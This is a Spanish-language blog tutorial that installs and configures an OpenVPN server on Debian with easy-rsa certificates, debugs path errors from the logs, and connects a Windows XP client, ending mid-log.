/&gt;OpenVPN es una solución basada en Secure Sockets Layer y red Privada Virtual.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Características:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;- Multiplataforma&lt;br /&gt;- Utiliza SSL/TLS&lt;br /&gt;- Simple configuración.&lt;br /&gt;- Es flexible y tiene una amplia configuración.&lt;br /&gt;- Publicado bajo licencia GPL de software libre.&lt;br /&gt;- Se puede implementar en capa 2 ó capa 3 del modelo OSI.&lt;br /&gt;- Permite control mediante grupos mediante reglas de firewall.&lt;br /&gt;- La autenticacion de clientes está basada en certificados, tarjetas inteligentes y/o con credenciales de usuario.&lt;br /&gt;- etc.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Instalación de paquetes:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;root@www:~# apt-get install openvpn liblzo2-2 lzop openssl&lt;br /&gt;Do you want to continue [Y/n]? Y&lt;br /&gt;  openssl-blacklist liblzo2-2 libpkcs11-helper1 openvpn-blacklist openvpn&lt;br /&gt;Install these packages without verification [y/N]? y&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Cargamos el módulo y lo verificamos:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;root@www:~# modprobe tun&lt;br /&gt;root@www:~# lsmod | grep tun&lt;br /&gt;tun                     8740  0&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Creamos keys y Certificados:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;root@www:~# cp -r /usr/share/doc/openvpn/examples/easy-rsa/ /etc/openvpn/&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Configuramos las variables:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;root@www:~# vim /etc/openvpn/easy-rsa/2.0/vars&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style:italic;"&gt;Cambiar:&lt;/span&gt;&lt;br /&gt;   export EASY_RSA="`pwd`"&lt;br /&gt;por:&lt;br /&gt;   export EASY_RSA="/etc/openvpn/easy-rsa"&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style:italic;"&gt;Cambiar:&lt;/span&gt;&lt;br /&gt;export KEY_COUNTRY=AR&lt;br /&gt;export KEY_PROVINCE=BA&lt;br /&gt;export KEY_CITY=Buenos Aires&lt;br /&gt;export KEY_ORG="Mi VPN"&lt;br /&gt;export KEY_EMAIL="morsa@mi-dominio.com"&lt;br /&gt;export KEY_CONFIG=`/etc/openvpn/easy-rsa/2.0/whichopensslcnf $EASY_RSA`&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Darle permisos y ejecutar el script:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;root@www:/etc/openvpn/easy-rsa/2.0# chmod a+x vars&lt;br /&gt;root@www:/etc/openvpn/easy-rsa/2.0# ./vars&lt;br /&gt;NOTE: If you run ./clean-all, I will be doing a rm -rf on /etc/openvpn/easy-rsa/keys&lt;br /&gt;&lt;br /&gt;root@www:/etc/openvpn/easy-rsa/2.0# ./clean-all&lt;br /&gt;Please source the vars script first (i.e. "source ./vars")&lt;br /&gt;Make sure you have edited it to reflect your configuration.&lt;br /&gt;&lt;br /&gt;root@www:/etc/openvpn/easy-rsa/2.0# source ./vars&lt;br /&gt;NOTE: If you run ./clean-all, I will be doing a rm -rf on /etc/openvpn/easy-rsa/keys&lt;br /&gt;&lt;br /&gt;root@www:/etc/openvpn/easy-rsa/2.0# ./clean-all&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Creamos el CA (Certificado de Autoridad):&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;root@www:~# /etc/openvpn/easy-rsa/2.0/build-ca&lt;br /&gt;/etc/openvpn/easy-rsa/2.0/build-ca: line 8: /etc/openvpn/easy-rsa/pkitool: No such file or directory&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Editamos el build-ca por el error previo, se ve que configuramos alguna variable erronea:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;root@www:~# vim /etc/openvpn/easy-rsa/2.0/build-ca&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style:italic;"&gt;Cambiar:&lt;/span&gt;&lt;br /&gt;"$EASY_RSA/pkitool" --interact --initca $*&lt;br /&gt;&lt;span style="font-style:italic;"&gt;Por:&lt;/span&gt;&lt;br /&gt;"/etc/openvpn/easy-rsa/2.0/pkitool" --interact --initca $*&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Volvemos a ejecutar el build-ca para crear el Certificado:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;root@www:~# /etc/openvpn/easy-rsa/2.0/build-ca&lt;br /&gt;grep: /etc/openvpn/easy-rsa/openssl.cnf: No such file or directory&lt;br /&gt;pkitool: KEY_CONFIG (set by the ./vars script) is pointing to the wrong&lt;br /&gt;version of openssl.cnf: /etc/openvpn/easy-rsa/openssl.cnf&lt;br /&gt;The correct version should have a comment that says: easy-rsa version 2.x&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Colocarle la ruta completa al EASY_RSA, ya que no lo encuentra:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;root@www:~# vim /etc/openvpn/easy-rsa/2.0/vars&lt;br /&gt;export EASY_RSA="/etc/openvpn/easy-rsa/2.0/"&lt;br /&gt;&lt;br /&gt;root@www:/etc/openvpn/easy-rsa/2.0# source vars&lt;br /&gt;&lt;br /&gt;root@www:~# /etc/openvpn/easy-rsa/2.0/clean-all&lt;br /&gt;&lt;br /&gt;root@www:/etc/openvpn/easy-rsa/2.0# ./build-ca&lt;br /&gt;Country Name (2 letter code) [AR]:&lt;br /&gt;State or Province Name (full name) [BA]:&lt;br /&gt;Locality Name (eg, city) [BuenosAires]:&lt;br /&gt;Organization Name (eg, company) [MiVPN]:&lt;br /&gt;Organizational Unit Name (eg, section) []:&lt;br /&gt;Common Name (eg, your name or your server's hostname) [MiVPN CA]:&lt;br /&gt;Name []:&lt;br /&gt;Email Address [morsa@mi-dominio.com]:&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Creamos las keys en el Servidor:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;root@www:/etc/openvpn/easy-rsa/2.0# ./build-key-server servidor&lt;br /&gt;Country Name (2 letter code) [AR]:&lt;br /&gt;State or Province Name (full name) [BA]:&lt;br /&gt;Locality Name (eg, city) [BuenosAires]:&lt;br /&gt;Organization Name (eg, company) [MiVPN]:&lt;br /&gt;Organizational Unit Name (eg, section) []:&lt;br /&gt;Common Name (eg, your name or your server's hostname) [servidor]:&lt;br /&gt;Name []:&lt;br /&gt;Email Address [morsa@mi-dominio.com]:&lt;br /&gt;&lt;br /&gt;Please enter the following 'extra' attributes&lt;br /&gt;to be sent with your certificate request&lt;br /&gt;A challenge password []:miPassGuord&lt;br /&gt;An optional company name []:RedesSeguridad&lt;br /&gt;Using configuration from /etc/openvpn/easy-rsa/2.0//openssl.cnf&lt;br /&gt;Check that the request matches the signature&lt;br /&gt;Signature ok&lt;br /&gt;The Subject's Distinguished Name is as follows&lt;br /&gt;countryName           :PRINTABLE:'AR'&lt;br /&gt;stateOrProvinceName   :PRINTABLE:'BA'&lt;br /&gt;localityName          :PRINTABLE:'BuenosAires'&lt;br /&gt;organizationName      :PRINTABLE:'MiVPN'&lt;br /&gt;commonName            :PRINTABLE:'servidor'&lt;br /&gt;emailAddress          :IA5STRING:'morsa@mi-dominio.com'&lt;br /&gt;Certificate is to be certified until Dec 28 00:19:33 2021 GMT (3650 days)&lt;br /&gt;Sign the certificate? [y/n]:&lt;br /&gt;&lt;br /&gt;1 out of 1 certificate requests certified, commit? [y/n]&lt;br /&gt;Write out database with 1 new entries&lt;br /&gt;Data Base Updated&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Creamos la de un cliente solo, si quiere agregar más solo va cambiando el clienteA por otro nombre deseado:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;root@www:/etc/openvpn/easy-rsa/2.0# ./build-key clienteA&lt;br /&gt;Country Name (2 letter code) [AR]:&lt;br /&gt;State or Province Name (full name) [BA]:&lt;br /&gt;Locality Name (eg, city) [BuenosAires]:&lt;br /&gt;Organization Name (eg, company) [MiVPN]:&lt;br /&gt;Organizational Unit Name (eg, section) []:&lt;br /&gt;Common Name (eg, your name or your server's hostname) [clienteA]:&lt;br /&gt;Name []:&lt;br /&gt;Email Address [morsa@mi-dominio.com]:&lt;br /&gt;&lt;br /&gt;Please enter the following 'extra' attributes&lt;br /&gt;to be sent with your certificate request&lt;br /&gt;A challenge password []:otroPass&lt;br /&gt;An optional company name []:RedesSeguridad&lt;br /&gt;Using configuration from /etc/openvpn/easy-rsa/2.0//openssl.cnf&lt;br /&gt;Check that the request matches the signature&lt;br /&gt;Signature ok&lt;br /&gt;The Subject's Distinguished Name is as follows&lt;br /&gt;countryName           :PRINTABLE:'AR'&lt;br /&gt;stateOrProvinceName   :PRINTABLE:'BA'&lt;br /&gt;localityName          :PRINTABLE:'BuenosAires'&lt;br /&gt;organizationName      :PRINTABLE:'MiVPN'&lt;br /&gt;commonName            :PRINTABLE:'clienteA'&lt;br /&gt;emailAddress          :IA5STRING:'morsa@mi-dominio.com'&lt;br /&gt;Certificate is to be certified until Dec 28 00:32:03 2021 GMT (3650 days)&lt;br /&gt;Sign the certificate? [y/n]:y&lt;br /&gt;&lt;br /&gt;1 out of 1 certificate requests certified, commit? [y/n]y&lt;br /&gt;Write out database with 1 new entries&lt;br /&gt;Data Base Updated&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Crear parámetros DF (Diffie Hellman):&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;root@www:/etc/openvpn/easy-rsa/2.0# ./build-dh&lt;br /&gt;Generating DH parameters, 1024 bit long safe prime, generator 2&lt;br /&gt;This is going to take a long time&lt;br /&gt;.......................+...+....................................................................................................+.........................+.............+..........................................................................+....+........+......+..................+................................+................+.............................&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Keys:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;El directorio /etc/openvpn/easy-rsa/2.0/keys contiene las keys generadas previamente:&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;root@www:/etc/openvpn/easy-rsa/2.0/keys# ls -l&lt;br /&gt;total 68&lt;br /&gt;-rw-r--r-- 1 root root 3862 Dec 30 21:19 01.pem&lt;br /&gt;-rw-r--r-- 1 root root 3741 Dec 30 21:32 02.pem&lt;br /&gt;-rw-r--r-- 1 root root 1204 Dec 30 21:17 ca.crt&lt;br /&gt;-rw------- 1 root root  887 Dec 30 21:17 ca.key&lt;br /&gt;-rw-r--r-- 1 root root 3741 Dec 30 21:32 clienteA.crt&lt;br /&gt;-rw-r--r-- 1 root root  749 Dec 30 21:32 clienteA.csr&lt;br /&gt;-rw------- 1 root root  887 Dec 30 21:32 clienteA.key&lt;br /&gt;-rw-r--r-- 1 root root  245 Dec 30 21:35 dh1024.pem&lt;br /&gt;-rw-r--r-- 1 root root  216 Dec 30 21:32 index.txt&lt;br /&gt;-rw-r--r-- 1 root root   21 Dec 30 21:32 index.txt.attr&lt;br /&gt;-rw-r--r-- 1 root root   21 Dec 30 21:19 index.txt.attr.old&lt;br /&gt;-rw-r--r-- 1 root root  108 Dec 30 21:19 index.txt.old&lt;br /&gt;-rw-r--r-- 1 root root    3 Dec 30 21:32 serial&lt;br /&gt;-rw-r--r-- 1 root root    3 Dec 30 21:19 serial.old&lt;br /&gt;-rw-r--r-- 1 root root 3862 Dec 30 21:19 servidor.crt&lt;br /&gt;-rw-r--r-- 1 root root  753 Dec 30 21:19 servidor.csr&lt;br /&gt;-rw------- 1 root root  887 Dec 30 21:19 servidor.key&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;Para autenticar a la VPN desde el cliente debemos copiar el ca.crt, clienteA.crt y clienteA.key. Cualquiera que tenga estos 3 archivos puede conectarse a la VPN, es recomendable transferirlos por un canal seguro ó encriptando los archivos.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Copiamos los archivos restantes a la ruta /etc/openvpn:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;root@www:~# cd /etc/openvpn/easy-rsa/2.0/keys/ &lt;br /&gt;root@www:/etc/openvpn/easy-rsa/2.0/keys# cp -pf ca.crt ca.key dh1024.pem servidor.crt servidor.key /etc/openvpn/&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Configuramos la VPN en el Servidor:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Creamos el archivo openvpn.conf y ponemos lo siguiente:&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;root@www:~# vim /etc/openvpn/openvpn.conf&lt;br /&gt;#Interface, protocolo y puerto&lt;br /&gt;dev tun&lt;br /&gt;proto tcp&lt;br /&gt;port 1194&lt;br /&gt;&lt;br /&gt;#Keys y Certificados&lt;br /&gt;ca /etc/openvpn/easy-rsa/keys/ca.crt&lt;br /&gt;cert /etc/openvpn/easy-rsa/keys/server.crt&lt;br /&gt;key /etc/openvpn/easy-rsa/keys/server.key&lt;br /&gt;dh /etc/openvpn/easy-rsa/keys/dh1024.pem&lt;br /&gt;&lt;br /&gt;#Usuario, grupo e ip&lt;br /&gt;user nobody&lt;br /&gt;group nogroup&lt;br /&gt;server 10.8.0.0 255.255.255.0&lt;br /&gt;&lt;br /&gt;#Queda persistente al reinicio&lt;br /&gt;persist-key&lt;br /&gt;persist-tun&lt;br /&gt;&lt;br /&gt;#Estado de verbosidad openvpn-status.log&lt;br /&gt;#verb 3&lt;br /&gt;client-to-client&lt;br /&gt;&lt;br /&gt;push "redirect-gateway def1"&lt;br /&gt;&lt;br /&gt;#log-append /var/log/openvpn&lt;br /&gt;comp-lzo&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Iniciamos el demonio:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;root@www:~# /etc/init.d/openvpn start&lt;br /&gt;Starting virtual private network daemon: openvpn &lt;span style="font-weight:bold;"&gt;failed&lt;/span&gt;!&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Habilitamos el log en el /var/log/ para depurar el motivo por el cuál no inicia:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;root@www:~# vim /etc/openvpn/openvpn.conf&lt;br /&gt;&lt;br /&gt;Descomentar:&lt;br /&gt; log-append /var/log/openvpn&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Mostrar el log mientras reiniciamos nuevamente el servicio:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;root@www:~# tail -f /var/log/openvpn&lt;br /&gt;Fri Dec 30 22:49:22 2011 OpenVPN 2.1.3 i486-pc-linux-gnu [SSL] [LZO2] [EPOLL] [PKCS11] [MH] [PF_INET6] [eurephia] built on Oct 21 2010&lt;br /&gt;Fri Dec 30 22:49:22 2011 WARNING: --keepalive option is missing from server config&lt;br /&gt;Fri Dec 30 22:49:22 2011 NOTE: your local LAN uses the extremely common subnet address 192.168.0.x or 192.168.1.x.  Be aware that this might create routing conflicts if you connect to the VPN server from public locations such as internet cafes that use the same subnet.&lt;br /&gt;Fri Dec 30 22:49:22 2011 NOTE: OpenVPN 2.1 requires '--script-security 2' or higher to call user-defined scripts or executables&lt;br /&gt;Fri Dec 30 22:49:22 2011 &lt;span style="font-weight:bold;"&gt;Cannot open /etc/openvpn/easy-rsa/keys/dh1024.pem&lt;/span&gt; for DH parameters: error:02001002:system library:fopen:No such file or directory: error:2006D080:BIO routines:BIO_new_file:no such file&lt;br /&gt;Fri Dec 30 22:49:22 2011 Exiting&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Modificar la ruta de los archivos que pusimos incorrectamente:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;root@www:~# vim /etc/openvpn/openvpn.conf&lt;br /&gt;#Keys y Certificados&lt;br /&gt;ca /etc/openvpn/ca.crt&lt;br /&gt;cert /etc/openvpn/servidor.crt&lt;br /&gt;key /etc/openvpn/servidor.key&lt;br /&gt;dh /etc/openvpn/dh1024.pem&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Reiniciamos nuevamente y vemos en el log que no hay errores:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;root@www:~# /etc/init.d/openvpn start&lt;br /&gt;Starting virtual private network daemon: openvpn.&lt;br /&gt;root@www:~#&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;root@www:~# tail -f /var/log/openvpn&lt;br /&gt;Fri Dec 30 23:00:07 2011 OpenVPN 2.1.3 i486-pc-linux-gnu [SSL] [LZO2] [EPOLL] [PKCS11] [MH] [PF_INET6] [eurephia] built on Oct 21 2010&lt;br /&gt;Fri Dec 30 23:00:07 2011 &lt;span style="font-weight:bold;"&gt;WARNING&lt;/span&gt;: --keepalive option is missing from server config&lt;br /&gt;Fri Dec 30 23:00:07 2011 NOTE: your local LAN uses the extremely common subnet address 192.168.0.x or 192.168.1.x.  Be aware that this might create routing conflicts if you connect to the VPN server from public locations such as internet cafes that use the same subnet.&lt;br /&gt;Fri Dec 30 23:00:07 2011 NOTE: OpenVPN 2.1 requires '--script-security 2' or higher to call user-defined scripts or executables&lt;br /&gt;Fri Dec 30 23:00:07 2011 /usr/bin/openssl-vulnkey -q -b 1024 -m &lt;modulus omitted&gt;&lt;br /&gt;Fri Dec 30 23:00:08 2011 TUN/TAP device tun0 opened&lt;br /&gt;Fri Dec 30 23:00:08 2011 /sbin/ifconfig tun0 10.8.0.1 pointopoint 10.8.0.2 mtu 1500&lt;br /&gt;Fri Dec 30 23:00:08 2011 GID set to nogroup&lt;br /&gt;Fri Dec 30 23:00:08 2011 UID set to nobody&lt;br /&gt;Fri Dec 30 23:00:08 2011 Listening for incoming TCP connection on [undef]&lt;br /&gt;Fri Dec 30 23:00:08 2011 TCPv4_SERVER link local (bound): [undef]&lt;br /&gt;Fri Dec 30 23:00:08 2011 TCPv4_SERVER link remote: [undef]&lt;br /&gt;Fri Dec 30 23:00:08 2011 &lt;span style="font-weight:bold;"&gt;Initialization Sequence Completed&lt;/span&gt;&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;Tengamos en cuenta que tengo una ip privada en vez de una ip pública en el server, por eso indica que haya posibles conflictos de ruteo si se conecta a la VPN&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Vemos la interface virtual tun0 cuando iniciamos el servicio de VPN:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;root@www:~# ifconfig tun&lt;br /&gt;tun0      Link encap:UNSPEC  HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00&lt;br /&gt;          inet addr:10.8.0.1  P-t-P:10.8.0.2  Mask:255.255.255.255&lt;br /&gt;          UP POINTOPOINT RUNNING NOARP MULTICAST  MTU:1500  Metric:1&lt;br /&gt;          RX packets:0 errors:0 dropped:0 overruns:0 frame:0&lt;br /&gt;          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;          collisions:0 txqueuelen:100&lt;br /&gt;          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Vemos también que está escuchando en el puerto configurado:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;root@www:~# netstat -tpln | grep openvpn&lt;br /&gt;tcp        0      0 0.0.0.0:1194            0.0.0.0:*               LISTEN      4042/openvpn&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;NOTA:&lt;/span&gt; Si notamos un poco lenta la conexión comentamos la linea de compresión: comp-lzo en /etc/openvpn/openvpn.conf&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Cliente OpenVPN para windows XP:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Descargamos el cliente de:&lt;br /&gt;&lt;a href="http://swupdate.openvpn.net/downloads/openvpn-client.msi"&gt;http://swupdate.openvpn.net/downloads/openvpn-client.msi&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/-ZhaO7UW5oMw/Tv6ikW9UEyI/AAAAAAAAAzY/4wq-pYoj4iE/s1600/01openVPNclientWin.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 246px;" src="http://2.bp.blogspot.com/-ZhaO7UW5oMw/Tv6ikW9UEyI/AAAAAAAAAzY/4wq-pYoj4iE/s320/01openVPNclientWin.JPG" border="0" alt=""id="BLOGGER_PHOTO_ID_5692165724564624162" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Requiere el adonet, lo descargamos de Microsoft:&lt;br /&gt;&lt;a href="http://www.microsoft.com/download/en/confirmation.aspx?id=22"&gt;http://www.microsoft.com/download/en/confirmation.aspx?id=22&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/-4wENIgLOtGE/Tv6i6g5PyII/AAAAAAAAAzk/YrOt8pP-Xdg/s1600/02adonet.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 298px;" src="http://2.bp.blogspot.com/-4wENIgLOtGE/Tv6i6g5PyII/AAAAAAAAAzk/YrOt8pP-Xdg/s320/02adonet.JPG" border="0" alt=""id="BLOGGER_PHOTO_ID_5692166105189042306" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Luego de instalar el adonet instalamos por defecto el cliente vpn para windows y creamos un archivo llamado: ClienteA.ovpn:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;#Contenido de ClienteA.ovpn&lt;br /&gt;dev tun&lt;br /&gt;client&lt;br /&gt;proto tcp&lt;br /&gt;remote 192.168.1.102 1194&lt;br /&gt;resolv-retry infinite&lt;br /&gt;nobind&lt;br /&gt;user nobody&lt;br /&gt;group nogroup&lt;br /&gt;&lt;br /&gt;persist-key&lt;br /&gt;persist-tun&lt;br /&gt;ca ca.crt&lt;br /&gt;cert clienteA.crt&lt;br /&gt;key clienteA.key&lt;br /&gt;comp-lzo&lt;br /&gt;&lt;br /&gt;verb 3&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;Lo importamos, nos aparece un error que no encuentra el ca.crt, luego pasa lo mismo con ClienteA.crt y con ClienteA.key:&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/-y9Pxt7FLuEs/Tv6lnDmfSOI/AAAAAAAAA0Y/4SJk6hABk4o/s1600/11.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 258px; height: 320px;" src="http://4.bp.blogspot.com/-y9Pxt7FLuEs/Tv6lnDmfSOI/AAAAAAAAA0Y/4SJk6hABk4o/s320/11.JPG" border="0" alt=""id="BLOGGER_PHOTO_ID_5692169069443107042" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Le colocamos los archivos en la ruta correcta y volvemos a importar el archivo ClienteA.ovpn:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/-BbkROd3U3hU/Tv6lm-OqN9I/AAAAAAAAA0I/QmiFPncgSMI/s1600/10.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 236px;" src="http://2.bp.blogspot.com/-BbkROd3U3hU/Tv6lm-OqN9I/AAAAAAAAA0I/QmiFPncgSMI/s320/10.JPG" border="0" alt=""id="BLOGGER_PHOTO_ID_5692169068000982994" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Seleccionamos Local File:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/-KO4ILV6_PrA/Tv6lmuKsGlI/AAAAAAAAAz8/L7O6SzMS82Y/s1600/09.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 258px; height: 320px;" src="http://3.bp.blogspot.com/-KO4ILV6_PrA/Tv6lmuKsGlI/AAAAAAAAAz8/L7O6SzMS82Y/s320/09.JPG" border="0" alt=""id="BLOGGER_PHOTO_ID_5692169063689362002" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Clickeamos en el + de Connection Profiles:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/-ga5X3CzgYcU/Tv6lmk0yYQI/AAAAAAAAAzw/6nS8_V5BWRk/s1600/08.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 260px; height: 320px;" src="http://1.bp.blogspot.com/-ga5X3CzgYcU/Tv6lmk0yYQI/AAAAAAAAAzw/6nS8_V5BWRk/s320/08.JPG" border="0" alt=""id="BLOGGER_PHOTO_ID_5692169061181579522" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Seleccionamos el botón naranja como indica la siguiente imagen:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/-_K4Uz3jpkMs/Tv6n_6S3dPI/AAAAAAAAA0g/FEJzRJp8kMQ/s1600/13.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 258px; height: 320px;" src="http://3.bp.blogspot.com/-_K4Uz3jpkMs/Tv6n_6S3dPI/AAAAAAAAA0g/FEJzRJp8kMQ/s320/13.JPG" border="0" alt=""id="BLOGGER_PHOTO_ID_5692171695464871154" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Ya nos hemos conectado a la VPN:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/-NMzyeElgeV0/Tv6oj6oHUAI/AAAAAAAAA0s/SsRQKCF23KY/s1600/14.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 228px;" src="http://3.bp.blogspot.com/-NMzyeElgeV0/Tv6oj6oHUAI/AAAAAAAAA0s/SsRQKCF23KY/s320/14.JPG" border="0" alt=""id="BLOGGER_PHOTO_ID_5692172314029281282" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Vemos en los logs cuando se establece la conexión:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;root@www:~# tail -f /var/log/openvpn&lt;br /&gt;Sat Dec 31 00:23:26 2011 TCPv4_SERVER link local: [undef]&lt;br /&gt;Sat Dec 31 00:23:26 2011 TCPv4_SERVER link remote: [AF_INET]192.168.1.100:14407&lt;br /&gt;Sat Dec 31 00:23:27 2011 192.168.1.100:14407 [clienteA] Peer Connection Initiated with [AF_INET]192.168.1.100:14407&lt;br /&gt;Sat Dec 31 00:25:16 2011 clienteA/192.168.1.100:14407 Connection reset, restarting [-1]&lt;br /&gt;Sat Dec 31 00:27:15 2011 Re-using SSL/TLS context&lt;br /&gt;Sat Dec 31 00:27:15 2011 LZO compression initialized&lt;br /&gt;Sat Dec 31 00:27:15 2011 TCP connection established with [AF_INET]192.168.1.100:14446&lt;br /&gt;Sat Dec 31 00:27:15 2011 TCPv4_SERVER link local: 